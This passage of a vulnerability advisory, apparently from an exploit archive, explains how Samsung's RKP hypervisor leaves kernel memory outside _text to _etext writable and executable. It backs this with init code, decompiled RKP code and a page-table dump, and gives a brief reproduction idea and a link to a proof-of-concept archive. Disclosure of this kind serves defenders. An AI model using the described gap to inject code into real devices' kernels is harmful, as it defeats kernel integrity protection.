init._text = (u64) _text;
init._etext = (u64) _etext;
if (!vmm_extra_mem) {
printk(KERN_ERR"Disable RKP: Failed to allocate extra mem\n");
return;
}
init.extra_memory_addr = __pa(vmm_extra_mem);
init.extra_memory_size = 0x600000;
init._srodata = (u64) __start_rodata;
init._erodata =(u64) __end_rodata;
init.large_memory = rkp_support_large_memory;
rkp_call(RKP_INIT, (u64)&init, 0, 0, 0, 0);
}
Upon receiving this command, RKP changes the stage 2 permissions for the address range corresponding to the kernel text (from "init._text" to "init._etext") to read-only and executable, like so:
...
kernel_text_phys_start = rkp_get_pa(text);
kernel_text_phys_end = rkp_get_pa(etext);
rkp_debug_log("DEFERRED INIT START", 0LL, 0LL, 0LL);
if ( etext & 0x1FFFFF )
rkp_debug_log("Kernel range is not aligned", 0LL, 0LL, 0LL);
if ( !rkp_s2_range_change_permission(kernel_text_phys_start, kernel_text_phys_end, 128LL, 1, 1) )
rkp_debug_log("Failed to make Kernel range RO", 0LL, 0LL, 0LL);
rkp_l1pgt_process_table(init_mm_pgd, 1u, 1u);
...
However, notice that the code above only marks the region from _text to _etext as read-only. This region is *strictly smaller* than the physical address range reserved for the kernel text region (in part in order to account for RKP's KASLR slide, which means the kernel can be placed at several offsets within this region). If we take a look at the stage 1 translation table from TTBR1_EL1, we can see that the kernel code pages are allocated using L2 block descriptors (i.e., a large granularity), like so:
...
[256] L1 table [PXNTable: 0, APTable: 0]
[ 0] 0x080000000-0x080200000 [PXN: 0, UXN: 1, AP: 0]
[ 1] 0x080200000-0x080400000 [PXN: 0, UXN: 1, AP: 0]
[ 2] 0x080400000-0x080600000 [PXN: 0, UXN: 1, AP: 0]
[ 3] 0x080600000-0x080800000 [PXN: 0, UXN: 1, AP: 0]
[ 4] 0x080800000-0x080a00000 [PXN: 0, UXN: 1, AP: 0]
[ 5] 0x080a00000-0x080c00000 [PXN: 0, UXN: 1, AP: 0]
[ 6] 0x080c00000-0x080e00000 [PXN: 0, UXN: 1, AP: 0]
[ 7] 0x080e00000-0x081000000 [PXN: 0, UXN: 1, AP: 0]
[ 8] 0x081000000-0x081200000 [PXN: 0, UXN: 1, AP: 0]
[ 9] 0x081200000-0x081400000 [PXN: 0, UXN: 1, AP: 0]
[ 10] 0x081400000-0x081600000 [PXN: 1, UXN: 1, AP: 0]
...
Moreover, as we can see above, the region 0x080000000-0x081400000 is marked as RWX in the stage 1 translation table, even though the kernel code pages only take up a much smaller area within this region.
Combining these facts, we arrive at the conclusion that any address in the range 0x080000000-"_text" or "_etext"-0x081400000 are marked as RWX both in stage 1 and stage 2, even after RKP is initialized.
This issue can be reproduced by simply writing code to any of these memory regions in EL1 and executing it directly (e.g., writing code to address 0xffffffc000000000 in the kernel's VAS).
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41217.zip